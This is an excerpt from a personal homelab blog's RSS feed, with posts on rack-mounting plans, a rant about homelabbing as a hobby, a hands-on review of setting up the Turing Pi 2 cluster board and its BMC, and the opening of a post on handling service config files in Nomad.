<p>The thing isn&rsquo;t going to be too much to look at. I generally don&rsquo;t have a problem
with being surrounded by tech - but the rack is open, and the side panels of my
chosen case are just plain metal. I&rsquo;m currently considering whether I might dig
deep (and I would have to dig REALLY deep) to find where my artistic creativity
is hiding. Or I might see whether there&rsquo;s an artist who would be willing to lend
me their creativity for a hefty sum of money. &#x1f605;</p>
<h1 id="final-words">Final words</h1>
<p>It took me quite a while to put all of this together, but I think I&rsquo;m pretty
happy with it now. I&rsquo;m mostly worried about the noise at the moment. But that
should be taken care of with the 3U cases with 120mm fans in them.</p>
<p>For now, I&rsquo;ve only bought two of the cases and the Pi case. I will immediately
mount the two Turing Pi 2 machines. But before I can mount the H3, I need to wait
for a friend to finish a 3D print of H3 to Mini ITX adapters for me. Once I&rsquo;ve
got those, I will order the last two H3 and cases. I will also look into HDD
noise reduction again.</p>
<p>In total, this &ldquo;simple&rdquo; change of mounts costs me a pretty penny.
The only real thing I could have had cheaper was the Pi mount. Instead of
using an actual rack mount, I could have gone with another shelf and put all the
Pis on there. But I really liked the idea of the Pi rack mount. The rack itself
as well as the cases are already the cheapest I could find. 19&quot; rack mount cases
are ridiculously expensive. No wonder everybody is moving to the cloud when
you can easily plunk down a thousand bucks just on a single 19&quot; server case.</p>
<p>I&rsquo;ve already got most of the parts - only the rack itself somehow got itself
lost somewhere in the current DHL strikes. Hopefully it finds its way to me
soon.</p>
<p>Does anybody have any good tips? Anything else I should be thinking about?</p>
]]></content:encoded>
    </item>
    <item>
      <title>Homelabbing: A really nice hobby</title>
      <link>https://blog.mei-home.net/posts/homelab-hobby/</link>
      <pubDate>Tue, 07 Feb 2023 23:30:40 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/homelab-hobby/</guid>
      <description>A small rant on people sticking their noses into my life, but mostly an ode to Homelabbing as a hobby</description>
      <content:encoded><![CDATA[<p>You are about to witness this blog&rsquo;s first rant. Proceed with caution, or not
at all if you&rsquo;re so inclined.</p>
<p>Without further ado: Piss off. No, I don&rsquo;t <em>need</em> this many machines. I want
this many physical machines. Every single one of them was a very conscious
decision driven by a clear design goal. Is your standard reaction to somebody
excitedly telling you about their newest hobby toy really &ldquo;do you need this much of your hobby?&rdquo;
or &ldquo;but it costs so much!&rdquo;? My fucking goodness.</p>
<p>/rant</p>
<p>Sorry, that needed to be said after I made the mistake of telling certain people
in my life about my newest Homelab plans for the umpteenth time, and I was getting
the same tired old &ldquo;What do you need all these computers for?&rdquo; and &ldquo;Aren&rsquo;t there
better things to spend your money on?&rdquo; questions again. And because I&rsquo;m rather
the non-confrontational type in my private life, you now got the above rant,
instead of the person who triggered it. Don&rsquo;t worry, if you can read and
understand the above, you&rsquo;re not the target. :slight_smile:</p>
<p>But I also want to take this chance not just to rant, but also to talk about
the homelabbing community and homelabbing as a hobby.</p>
<p>Over the years, I&rsquo;ve read a lot about people&rsquo;s motivations. From what I saw,
there are three very general categories:</p>
<ol>
<li>The people who got into it to hone their skills, e.g. with a small kubernetes
cluster</li>
<li>The people who got into it just for the fun of it</li>
<li>The people who got into it for ideological reasons, e.g. owning your own
data or getting away from the large web giants</li>
</ol>
<p>I came into it mostly from category two and a bit from category three. Let&rsquo;s
start with category three motivation: I don&rsquo;t really have an ideology here -
you will certainly see me encouraging people to try out homelabbing and
selfhosting things like Mastodon - <em>if they feel up to it</em>. But you won&rsquo;t see
me arguing for the more militant &ldquo;everybody should selfhost everything!&rdquo; stance
that the more radical category three people argue.</p>
<p>So for me, it&rsquo;s mostly just: Fun! My original trigger was a bit of &ldquo;every <em>real</em>
CS student should have a homeserver!&rdquo; thinking. And yes, I&rsquo;m now a bit embarrassed
about that. &#x1f609;
I&rsquo;m definitely not in category one. I&rsquo;m a software engineer by training, and
I&rsquo;m currently responsible for turning code into binaries in a large scale project.
If I really wanted to go looking for it, I might argue that homelabbing taught
me something about debugging approaches. And especially that &ldquo;breadth first&rdquo; instead
of depth first approach to debugging often leads to faster results. But at work,
I&rsquo;m in the enviable position to have an entire, rather competent team who runs
any workloads on any given one of a dozen or so Kubernetes clusters. I don&rsquo;t
think I ever needed to use any Homelab knowledge at work.
That is not to say I didn&rsquo;t have fun learning about networking, Ceph storage
clusters, Docker and so on. But it wasn&rsquo;t the main motivation. The main motivation
was always &ldquo;running services to use&rdquo;. And having fun while doing it. And yes,
sometimes that fun for me comes from doing &ldquo;it&rdquo; in the most complex, totally
overblown way that still looks maintainable. &#x1f913;</p>
<p>I&rsquo;ve been homelabbing since somewhere in the early 2010&rsquo;s. Only in the pandemic
years did I actually realize that there&rsquo;s a community around the hobby. And at
least from my PoV, it&rsquo;s a nice one. Take <a href="https://www.reddit.com/r/selfhosted/">r/selfhosted</a>
as an example. What has surprised me the most over the round about two years
I&rsquo;ve been reading there is that the gatekeeping is rather minimal. There&rsquo;s no
&ldquo;Any real homelabber doesn&rsquo;t start below a dual Xeon machine&rdquo;. In fact, most
of the time when people are asking about good starter machines, the advice is
pretty solid: Either get a Raspberry Pi board (not too easy at the moment&hellip;)
or go and buy one of those corporate office machines from ebay for a couple hundred
bucks. Nobody there cares whether you&rsquo;ve got a 25U rack or a Pi.
Even VMs in the cloud are accepted there. Albeit that might look a bit different
in <a href="https://www.reddit.com/r/homelab/">r/homelab</a>.</p>
<p>I&rsquo;ve now also found a very nice community on <a href="https://joinmastodon.org/">Mastodon</a>
talking about Homelabbing and selfhosting pretty much the entire day. Pretty much
my people. &#x1f913;</p>
<h2 id="so-what-is-homelabbing">So what IS homelabbing?</h2>
<p>I think the best definition I ever read for homelabbing is this:</p>
<blockquote>
<p>Cosplaying as a sysadmin</p></blockquote>
<p>And whether you&rsquo;re doing it with a Raspberry Pi or an entire rack full of servers
really doesn&rsquo;t matter. There&rsquo;s also selfhosting. I think that is pretty similar,
and most of the time I use the two terms interchangeably. The difference might be
that a homelabber might be cosplaying as a sysadmin, while a selfhoster might
be cosplaying as a DevOps engineer. And yes, the fact that that&rsquo;s pretty much the
same today is exactly what I meant to convey. &#x1f609;</p>
<p>To me, the first attempts at homelabbing came from a simple need: My laptop ran
out of space for all the Linux ISOs. And instead of going the simple route and
buying an external HDD, I got myself a tower server and deployed Samba and
Subversion on it. These days, I&rsquo;m in the process of migrating to a server rack.
As mentioned at the very beginning: Do I need this many machines? Nah. It&rsquo;s a bit
like coffee and cigarettes: I might not <em>need</em> them, but without them I&rsquo;m going
to become rather cranky. And it&rsquo;s the same with the Homelab.</p>
<p>So this is one of the reasons why you might want a Homelab: You just feel a need,
and instead of fulfilling it the sensible way, you get yourself another computer.</p>
<p>Bam. Homelabbing.</p>
<p>And once you&rsquo;ve deployed your first service, the next question almost inevitably
is: What else could I do with this? And it turns out that there&rsquo;s a lot you can do
with a single always on machine. By now, I&rsquo;m running my <a href="https://nextcloud.com/">own cloud storage</a>,
my own <a href="https://gitea.io/">code forge</a>, my very own <a href="https://ceph.com/">storage cluster</a>
and a lot of other things. When I recently got into IoT with a couple of smart plugs,
I was confident that I could use them without having to rely on some external
cloud - I already had a full stack available to run the MQTT broker, data gathering
and visualization.</p>
<p>I like to call my own Homelab &ldquo;HomeProd&rdquo;, a bit tongue-in-cheek. Today, I rely
on having the services it provides available all day long. And it&rsquo;s nice to
have them. It&rsquo;s nice to be able to just upload stuff from any place, and be
able to access it from any other place, without having to go via a cloud provider.
(Okay, perhaps I&rsquo;m a little bit in the ideological category. &#x1f937;)
I&rsquo;m running <a href="https://social.mei-home.net">my own social media</a>, after all. But
that has also changed the direction of my Homelab a little bit. I was never too far
out on the &ldquo;homeLAB&rdquo; side of things. But since I started running my own Mastodon
instance and this blog, I started to have other people (somewhat) rely on my Homelab.
Even if it&rsquo;s just the thought of adding to other Mastodon admin&rsquo;s server load by
forcing them to retry delivery against my downed server a couple of times.
So downtimes became more and more unacceptable. I started to get really annoyed at
those times where I had to take my Homelab down, either to reconfigure networking
or reboot a host. Hence my quest to make my Homelab more highly available. And
with that we get back to the rant at the beginning: I&rsquo;ve got so many hosts because
I like to be able to reboot/shutdown/completely screw up a host without taking
the entire Homelab down. :slight_smile:</p>
<p>Like with many hobbies, a Homelab can be whatever you want it to be. It can be
as large or as small as you feel comfortable with. It can be as critical or as
ephemeral as you need it to be. It can be as reliable as AWS, or barely live
longer than a Saturday afternoon.</p>
<p>Have fun! And don&rsquo;t open ports in your firewall unless you are reasonably confident
in your abilities. &#x1f609;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Spreading out the Homelab: The Turing Pi 2 Cluster Board</title>
      <link>https://blog.mei-home.net/posts/turing-pi-2/</link>
      <pubDate>Sun, 29 Jan 2023 23:50:00 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/turing-pi-2/</guid>
      <description>Presenting my switch to a cluster of Raspberry Pis, why I did it and what board I am using</description>
      <content:encoded><![CDATA[<p>In my <a href="https://blog.mei-home.net/posts/homelab-2022/hardware/">previous post</a> on the hardware I am
using, I mentioned that I don&rsquo;t like my large Arch Linux x86 server very much.
Here, I will be going into the details of the problem I am having and how I
solved it.</p>
<h1 id="the-problem">The problem</h1>
<p>So until not very long ago at all, I only had a single server, with everything
running in a couple of Docker containers. Then COVID came, and I decided that
extending my homelab would be the perfect hobby for these lockdown times.
So I went and bought a beefier server with an Intel 10th Gen CPU and 96 GB
of RAM. Then I found <a href="https://linuxcontainers.org/lxd/introduction/">LXD</a> and
started introducing VMs. I also discovered <a href="https://ceph.io/">Ceph</a> and started
using it as my storage layer.</p>
<p>The problem which soon dawned on me: The Ceph VMs as well as the VMs running my
Nomad/Consul cluster were all running on an Arch system. Not exactly known for
stability, or the ability of behaving well when being updated after a longer
interval without updates. So reboots of the underlying OS were in order. And
those reboots of course required that I took down both, the Nomad cluster hosts
and the Ceph cluster hosts - both in VMs running on that Arch Linux server.</p>
<p>This results in needing to shut down everything when the underlying baremetal
OS needs an update.
First: Let&rsquo;s make clear that this actually works. Neither my Ceph cluster
nor my Nomad cluster have any problems with being shut down completely and
being rebooted.</p>
<p>But here&rsquo;s the problem: It annoyed me. An update went like this:</p>
<ol>
<li>Take down all services running in the cluster</li>
<li>Update and then shut down the cluster node VMs</li>
<li>Update and then shut down the cluster server node VM</li>
<li>Update and then shut down the Ceph VMs</li>
<li>Update and then reboot the underlying baremetal server</li>
<li>Start the Ceph VMs</li>
<li>Start the cluster server node VM</li>
<li>Start the cluster node VMs</li>
<li>Unseal Vault (important step I forget about half the time &#x1f605;)</li>
<li>Launch all services running on the cluster</li>
</ol>
<p>It is just annoying, and I was getting tired of not having my cluster available
during the maintenance windows. It annoys me even more now that I&rsquo;ve got a couple
of externally visible services, like Mastodon and this blog.</p>
<p>And yes dear readers, I&rsquo;m perfectly well aware that I&rsquo;m starting to stray
dangerously close to HomeProd territory. &#x1f609;</p>
<h1 id="the-solution">The solution</h1>
<p>The first, most obvious solution would have been three proper servers. Just
some nice, big, beefy machines. Which I could then run VMs for everything on.
Each of the hosts could get a Ceph VM for storage, a &ldquo;Controller&rdquo; VM for the
Nomad/Consul/Vault severs and a &ldquo;Cluster&rdquo; VM running the Nomad client for
workloads.</p>
<p>And in hindsight, over a year after I decided not to go that way, I think that
might have been the way to go. The right way. Instead, I&rsquo;ve now got no less
than four Raspberry Pis, running Vault/Consul/Nomad servers and Ceph MON
daemons (see <a href="https://blog.mei-home.net/posts/ha-nomad-stack/">this blog post</a>) as well
as one serving as a &ldquo;no dependencies at all&rdquo; bootstrap host. I&rsquo;ve also got
my Command and Control server, two Turing Pi 2 cluster boards with a total
of eight CM4 8 GB modules, an <a href="https://blog.mei-home.net/posts/udoo/">Udoo x86 II</a>
and an Odroid H3 pulling Ceph node duties. I&rsquo;ve also still got my beefy
X86 server. &#x1f926;</p>
<p>But that decision has been made, and lots of money has been spend. So, what do
I have now? This:</p>
<figure>
    <img loading="lazy" src="tp2.webp"
         alt="A picture of a mainboard with IO ports like RJ45 and USB, a standard ATX power connector and three Pi CM4 modules attached as well as an Nvidia Jetson in the process of being plugged into the last free slot on the board."/> <figcaption>
            <p>Via <a href="https://turingpi.com/">https://turingpi.com/</a></p>
        </figcaption>
</figure>

<p>This is the <a href="https://turingpi.com/">Turing Pi 2</a> cluster board.</p>
<h2 id="the-board">The Board</h2>
<p>This board has exactly what I always wanted: A good number of independent hosts,
with the ability of fitting up to four modules into its SO-DIMM slots. The
ability to use a standard ATX power supply, so you don&rsquo;t have to come up with
some jank solution to powering your 3.5&quot; HDDs or case fans. It also allows
for quite some extensibility, with two SATA connectors and two mPCIe slots.
For the cherry on top, it also has four NVMe slots on the bottom of the board.
Sadly, these cannot be used when using the board with Raspberry Pi CM4 modules,
as those only have a single PCIe Gen 2 lane. This means at most a 500 MByte/s
throughput. And only a single lane to route to something. The Turing Pi team
initially considered integrating a PCIe switch to make all peripherals available
to all nodes, but found that both the necessary engineering to integrate the
switch as well as the switch chip itself would be too costly.</p>
<p>So now, the board&rsquo;s traces look approximately like this:</p>
<figure>
    <img loading="lazy" src="tp2_interconnection.png"
         alt="A simple block diagram showing the connections from the four node slots to the different peripherals and sockets on the board. Further details in the following text."/> <figcaption>
            <p>Via <a href="https://turingpi.com/">https://turingpi.com/</a></p>
        </figcaption>
</figure>

<p>As the board is mainly focused on the CM4 and its limited PCIe capabilities,
each node is connected to one peripheral as follows:</p>
<ul>
<li>Node 1: A full 40 pin GPIO header and an mPCIe slot</li>
<li>Node 2: Another mPCIe slot</li>
<li>Node 3: Two SATA 6 GBit/s slots</li>
<li>Node 4: Two USB3 ports on the back IO as well as two more internal USB3 ports</li>
</ul>
<p>The board does not only support Raspberry Pi CM4, but also other modules.
Currently tested and confirmed to work are:</p>
<ul>
<li>Raspberry Pi CM4, both modules with and without eMMC</li>
<li>Nvidia Jetson Nano</li>
<li>Nvidia Jetson TX2 NX</li>
<li>Nvidia Xavier NX</li>
</ul>
<p>All of these, besides the CM4, also have access to bottom mounted NVMe slots.
With that bottom mounting, it&rsquo;s necessary to pay some attention when buying
a case. While the board itself is mini ITX, it might not fit all cases when
NVMe drives are fitted to the bottom.</p>
<p>In addition to all these peripheral goodies, the board also has an integrated
network switch chip, connected to the CM4s. It is a 1 GBit/s switch, with support
for some basic functionality like 802.1q VLANs.</p>
<p>Also connected to this switch is the BMC, the board management controller. It
is an Allwinner ARM SoC. It has some 1GB of flash available to it, and is running
the <a href="https://github.com/openbmc/openbmc">OpenBMC</a> distribution. This controller
is currently in an alpha state, only being able to run some basic functions.</p>
<p>With the BMC chip also come some nice Quality of Life improvements. For one
thing, it is possible to flash modules with eMMC directly from the board.
There&rsquo;s also a USB2 slot which can be switched from one to another in software
via the BMC.</p>
<p>Also extremely nice: All the serial consoles of the connected modules are
accessible on the BMC. This is especially nice for me, as it allows me to
observe netboots, and the accompanying problems with it, far easier than I could
now, futzing around with the kernel&rsquo;s netconsole.</p>
<h2 id="how-im-using-the-board">How I&rsquo;m using the board</h2>
<p>At the moment, I can only speak to how the board works with the CM4 module.</p>
<p>I became aware of the Turing Pi team when I was looking into spreading out my
Ceph cluster at the end of 2021. I wanted multiple hosts, because Ceph can
greatly benefit from more hosts, and also because I wanted a bit of HA. The
Pi seemed alright back then as well, but running 3.5&quot; HDDs through the USB
connection of the Pi seemed suspect. So I was pretty happy when I came across
the first ideas for the Turing Pi 2 board - which already included the mPCIe
slots as well as the SATA ports. My thinking being: I can just put mPCIe to SATA
cards into the two slots for additional SATA ports. Plus, the usage of a
standard ATX power connector on the board was a big plus - it meant I didn&rsquo;t
have to futz about with a weird special power brick for the board itself and
I would have SATA power cables to supply my disks and case fans.</p>
<p>I even ran an interesting experiment to confirm that I could use the board for
Ceph nodes, by buying an official Raspberry Pi CM4 IO board. This board has a
PCIe slot connected to the CM4&rsquo;s one PCIe lane. I plugged in a PCIe to SATA
card to see how the CM4 would react. And after switching to Ubuntu 21.10,
the CM4 had no problem booting from one of the disks attached to the CM4
via the PCIe to SATA card. I ran that CM4 on an IO board for almost a year
as one of my Ceph nodes.</p>
<figure>
    <img loading="lazy" src="cm4_ceph.png"
         alt="A picture of a CM4 IO board, with a CM4 attached. The IO board sits in a PC case, not fastened anywhere, resting on the cardboard box the IO board came in. A SATA card is attached to the IO board&#39;s PCIe slot, with two SATA cables connected to it."/> 
</figure>

<p>And it actually worked. But to make it work, I had to restrict the memory usage
of the OSD, Ceph&rsquo;s per-disk storage daemon. The minimum is 2.5 GB of RAM. Which
is fine to run on an 8GB CM4. But I never felt too good with this potential
performance reduction. So over the past year, I looked for alternatives - and
found one, in the <a href="https://www.hardkernel.com/shop/odroid-h3/">Odroid H3</a>.</p>
<p>Definitely too long story short: At this point, I will not be running any
Ceph nodes on the Turing Pi 2 boards anymore. Instead, all of the Pis on it
will be dedicated as Nomad cluster nodes running my workloads. All of the
Pis are also netbooting. If you are in for a really exhaustive look at netbooting
Raspberry Pis, have a look at my <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">posts on the topic</a>.</p>
<h2 id="setting-up-the-board">Setting up the board</h2>
<p>I received my board about two weeks ago. In addition to the board itself,
I had also ordered CM4 carrier boards, to adapt the Turing Pi&rsquo;s SO-DIMM slots
to the CM4 connector. I had also already ordered the <a href="https://www.fractal-design.com/de/products/cases/node/node-804/">Fractal Design Node 804</a>. I had ordered those when I still thought I
would use the boards with a couple of disks. Now they&rsquo;re way too big.</p>
<p>I had also ordered two boards, and I got pretty lucky: I was able, over the
past year, to assemble eight CM4 8 GB modules. With that, I&rsquo;m a lot luckier
than a lot of the other people in the Turning Pi community, who now got their
boards, but weren&rsquo;t able to source any of the compatible modules due to the
general Raspberry Pi shortage.</p>
<figure>
    <img loading="lazy" src="unpacked.jpg"
         alt="A picture of a Turing Pi 2 board, a Turing Pi 2 CM4 adapter board and eight Raspberry Pi CM4 modules with heatsinks attached."/> 
</figure>

<p>This shows my haul. I had already previously prepared all of the CM4 boards,
by attaching <a href="https://www.waveshare.com/cm4-heatsink.htm">this CM4 heatsink from Waveshare</a>.
The attachment of the heatsink was a bit fiddly, due to there not being any tool
to hold the standoffs steady while fastening the screws. My fingers were a bit
sore after I had finished up all eight of them. &#x1f609;</p>
<p>The first setup of one of the boards, without any modules, revealed an amusing
thing: Like for normal PC mainboards, the power supply provides a 5V standby
load. In PCs, this is for example used to provide the necessary power for the
NIC to listen to wake on LAN packages.
This power load was enough to immediately turn on the BMC, as well as supplying
the switch chip and a couple of LEDs on the board. The only problem was in
getting a connection to the BMC OS. By default, there is an SSH server running.
But: The only account available by default is <code>root</code>. And root access is
disabled in SSH by default.</p>
<p>Luckily, there&rsquo;s a really nice community on the Turing Pi Discord server. And
a couple of people had gotten their Turing Pi board before me, and had already
figured out how to get into the BMC by connecting to UART. I&rsquo;m not sure what
to think about this approach - yes, having root logins with a default password
available in the docs to login via SSH is a bad default config. But it&rsquo;s also
extremely convenient. As things stood, if you don&rsquo;t have a UART to USB cable,
you couldn&rsquo;t log into the BMC.</p>
<p>But logging into the BMC isn&rsquo;t actually necessary to access all available
functionality. There&rsquo;s a web UI. With exactly zero authentication. A web UI
which, among other things, allows switching on/off any of the nodes. And
flashing the BMC.
But it is worth mentioning: The firmware on the BMC is currently in an alpha
state. It will be completely rewritten in the near future.</p>
<p>But I was lucky: I already had a UART to USB cable at home. Connecting it to
the Turing Pi&rsquo;s BMC UART pins provided me with a way to login, using the
user <code>root</code> and the password <code>turing</code>.</p>
<figure>
    <img loading="lazy" src="uart.jpg"
         alt="A close up of the Turing Pi board&#39;s BMC UART header. There are several cables attached, a brown one to GND, a green one to RX and a white one to TX."/> 
</figure>

<p>When connecting UART, it is always important to remember that the TX pin of the
UART adapter needs to be connected to the RX pin on the board, and the same for
the RX pin on the adapter and the TX pin on the board.</p>
<p>The BMC OS also has one annoying quirk: It randomly generates a new MAC for the
NIC of the BMC chip at boot time. So whenever you reboot, your DHCP server
will see a new MAC.
This can be fixed by logging into the BMC and opening <code>/etc/network/interfaces</code>
and adding the following line to the <code>iface eth0</code> config:</p>
<pre tabindex="0"><code class="language-conf" data-lang="conf">hwaddress ether 5a:3c:de:c4:cb:18
</code></pre><p>Obviously, change the MAC address. &#x1f609;
Once that&rsquo;s done, your DHCP server will always see the same MAC from the BMC,
and you can safely do static DHCP assignments or even MAC address filtering or
MAC based VLANs.</p>
<p>To allow access to the BMC via SSH, everything is already configured reasonably
well. The only thing missing is the creation of a user apart from <code>root</code>, which
is sensibly not allowed to login via SSH.</p>
<p>At this point, please note that the OpenBMC environment uses busybox. So
<code>usermod</code> will not be available. You need to get your <code>adduser</code> correct the
first time. &#x1f609;</p>
<p>So the first step here is creating the <code>/home</code> directory, which for some reason
does not actually exist yet. Once that&rsquo;s done, adding the user is simple:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>adduser -s /bin/bash -D my_user
</span></span></code></pre></div><p>Then, create the user&rsquo;s <code>.ssh</code> dir and add your SSH key to <code>/home/my_user/.ssh/authorized_keys</code>.</p>
<p>Once all of that is done, you should also change the root password to something
more sensible than the default.</p>
<p>Once the BMC was set up to my liking (as noted, not much to really do here, due to
the BMC firmware being in Alpha state) I plugged in my first CM4 and navigated
to the Turing Pi&rsquo;s IP to access the web UI.</p>
<figure>
    <img loading="lazy" src="web_ui.png"
         alt="A screenshot of the Turing Pi 2 web UI. At the top is a tabbed menu, with the points usb, power, nodeInfo, sdcard, other and update. The tab power is currently selected. On the rest of the page are four slider on/off buttons, with a button labeled Submit at the very bottom."/> 
</figure>

<p>Setting all the nodes to power on supplies power to the nodes. As I was netbooting,
I was able to avoid some initial uncertainty concerning the process of flashing Pi CM4s
connected to the board. The team took about a week to supply even the most
basic docs after the first customers got their boards. The credentials for logging
into the BMC were found by a user via trial and error. Same goes for the serial
console settings necessary for the UART connection to the BMC.
This really wasn&rsquo;t a stellar moment for the team.</p>
<p>But as said, for me everything was fine because I was netbooting my CM4s anyway,
so before too long, I had four modules blinking away happily:</p>
<figure>
    <img loading="lazy" src="all_connected.jpg"
         alt="A picture of a Turing Pi 2 board with four CM4 modules attached, with green LEDs blinking away on all four."/> 
</figure>

<p>After some additional testing of the second board, I knew that everything was
working and continued to the second phase, properly deploying it all.</p>
<p>As mentioned above, I had bought the Fractal Node 804. Which is a really nice
case, in typical Fractal high quality fashion. It&rsquo;s just that they are way
too big these days.</p>
<figure>
    <img loading="lazy" src="in_case.jpg"
         alt="A picture of a Turing Pi 2 board in a Fractal Node 804 case. The mini ITX board takes up only a small amount of the available space."/> 
</figure>

<p>While installing the Turing Pi 2, I again thought that the ATX power connector,
and with it the ability to just use a standard PC PSU, might be one of its
biggest advantages. Due to using a standard PSU, I had the necessary SATA power
connectors available to attach to the 804&rsquo;s integrated fan hub/controller. Hence,
I did not have to worry about how to power the case fans, and I also get some
control over them.</p>
<p>After putting both of the boards into their respective cases, I only had to
boot the Pis, as I had already prepared their netbooting volumes before. Now,
they have become part of my Nomad cluster and are running jobs already.</p>
<p><figure>
    <img loading="lazy" src="nomad_topo_before.png"
         alt="A screenshot of the Nomad cluster topology page. It shows four hosts, with a total of 35 GB of RAM and 109 GHz of CPU."/> <figcaption>
            <p>My Nomad cluster topology before adding the Pis</p>
        </figcaption>
</figure>

<figure>
    <img loading="lazy" src="nomad_topo_after.png"
         alt="Another screenshot of the Nomad cluster topology page. It shows twelve hosts, with a total of 96 GB of RAM and 157 GHz of CPU."/> <figcaption>
            <p>My Nomad cluster topology after adding the Pis</p>
        </figcaption>
</figure>
</p>
<p>My Nomad cluster has not only become larger, it has also become better distributed.
So at least for now, I can easily reboot any cluster host, and the jobs which
ran on it will easily find another home. &#x1f642;</p>
<h1 id="final-thoughts">Final thoughts</h1>
<p>I like the board. Everything on it works well. Even the alpha firmware that&rsquo;s
currently on it. True, I can&rsquo;t control the integrated switch yet, but for now
at least that&rsquo;s okay. I can remotely switch the modules on and off too. And
I have them on a standard ATX PSU, with a mini ITX form factor.</p>
<p>This was actually my first Kickstarter. And at least for me, it was wildly
successful. The team delivered most of what they promised, and even if nothing
else comes out of it, I would still be rather satisfied, as it already does all
I need from it.
It was definitely a good thing that I already knew that they had previously
delivered the Turing Pi 1 successfully as well, which was still using Pi CM3
modules. and they were rather active on their Discord too. My worries about
getting scammed here were rather on the low end right from the start.</p>
<p>During the entire process from the end of the Kickstarter in the summer of
2022 to the delivery in the middle of January, there were a couple of hiccups.
One thing the team could do better is communication. There were a number of delays,
created first by introducing NVMe slots, then by switching out the firmware chip.</p>
<p>As previously mentioned, the firmware itself is also in a very alpha stage.</p>
<p>There is also currently a problem with the battery for the RTC clock. If it is
inserted, the BMC won&rsquo;t boot successfully. Removing it works around the problem,
but then you don&rsquo;t get reliable time on the BMC.</p>
<p>But I&rsquo;m still feeling very confident in saying: If a mini ITX board with a
standard ATX 24 pin power connector for four Raspberry Pi CM4 modules (or some
of the other supported modules) with some interesting peripherals sounds
interesting to you, there&rsquo;s no need to hesitate at this point.</p>
<p>The biggest fumble by the team at Turing Machines was that they had boards in
people&rsquo;s hands, but absolutely no documentation whatsoever on how to actually
use it.</p>
<p>If you&rsquo;re interested, head over to <a href="https://turingpi.com/">turingpi.com</a> and their
shop. But note: At time of writing, not even all Kickstarter backers have received
their board(s) yet, so it might be a while until you receive yours when buying
via the shop now.</p>
<p>Finally, one problem I found: Having to prepare images for eight hosts, where
there are only a couple of differences in the kernel command line and the
hostname, is tedious. Really tedious. I recently saw a video by the Youtuber
TechnoTim <a href="https://www.youtube.com/watch?v=lEqD3mRcqSo">here</a> where he takes
a look at Canonical&rsquo;s <a href="https://maas.io/">MaaS</a>. This looks like an interesting
possibility for making Raspberry Pi provisioning a bit less manual. But I will
have to look at bit deeper into it, especially to see whether it would be able
to mount Ceph RBD volumes on newly commissioning hosts. Also,
<a href="https://maas.io/tutorials/build-your-own-bare-metal-cloud-using-a-raspberry-pi-cluster-with-maas#1-overview">their Raspberry Pi guide</a>
currently requires the use of the Raspberry Pi UEFI boot approach, which looks
like it always needs some sort of local storage? This would negate all the
advantages of netbooting for me. I will have to see.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Handling service configuration files in Nomad</title>
      <link>https://blog.mei-home.net/posts/nomad-configs/</link>
      <pubDate>Thu, 12 Jan 2023 22:08:27 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/nomad-configs/</guid>
      <description>A horrific tale of S3-as-a-filesystem</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve just had a major success: My <code>docker-compose</code> like Nomad script can now
use the <code>nomad</code> binary with the <code>job run -output</code> command to transform a HCL
file into JSON for use in the Nomad API. Before, my tool was using the Nomad
API&rsquo;s <a href="https://developer.hashicorp.com/nomad/api-docs/jobs#parse-job">/v1/jobs/parse</a>
endpoint.</p>
<p>This meant that I was not able to make use of any of the <em>HCL2</em> functions
recently introduced. I&rsquo;m mostly interested in using the <a href="https://developer.hashicorp.com/nomad/docs/job-specification/hcl2/functions/file/file">file</a>
and <a href="https://developer.hashicorp.com/nomad/docs/job-specification/hcl2/functions/file/fileset">fileset</a>
functions, and I want to tell you why.</p>
<h1 id="handling-service-config-files-in-nomad">Handling service config files in Nomad</h1>
<p>What I want to talk about are not Nomad&rsquo;s own config files or job specs. Instead,
what I&rsquo;m going to talk about are the config files for the services I&rsquo;m running
on Nomad. For example <a href="https://docs.gitea.io/en-us/config-cheat-sheet/">Gitea&rsquo;s app.ini</a>
or <a href="https://docs.fluentd.org/configuration/config-file">Fluentd&rsquo;s</a> config files.</p>
<p>Somehow, you need to make sure that those are available to the service you&rsquo;re
running when it starts.</p>
<p>There are several obvious solutions to it. I could put those files onto the
service&rsquo;s CSI volume, for example. But an approach like this is sub-optimal,
because I would also like to have my config files in a Git repo. And I would
like to have them in the same Git repo as my Nomad job specs. And I would like
to not put the entire repo into every job&rsquo;s CSI volume. And what about jobs
which otherwise don&rsquo;t need any volumes? Just create one for that one config file?</p>
<p>Doesn&rsquo;t sound right, does it?</p>
<p>Of course, Nomad has a solution to that. Several in fact. Let&rsquo;s start with the
simplest one: You can just put your config files into the job spec. The <a href="https://developer.hashicorp.com/nomad/docs/job-specification/template">template stanza</a>
has the <code>data</code> option, for example.
But that also seems wrong to me, because it would mix concerns in a single file:
Configuring the service, and telling the orchestrator how to run that service.</p>
<p>So the next approach is the <a href="https://developer.hashicorp.com/nomad/docs/job-specification/artifact">artifact stanza</a>.
It looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;docs&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;example&#34;</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;server&#34;</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">artifact</span> {
</span></span><span style="display:flex;"><span>        source      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://example.com/file.tar.gz&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/some-directory&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">options</span> {
</span></span><span style="display:flex;"><span>          checksum <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;md5:df6a4178aec9fbdc1d6d7e3634d1bc33&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
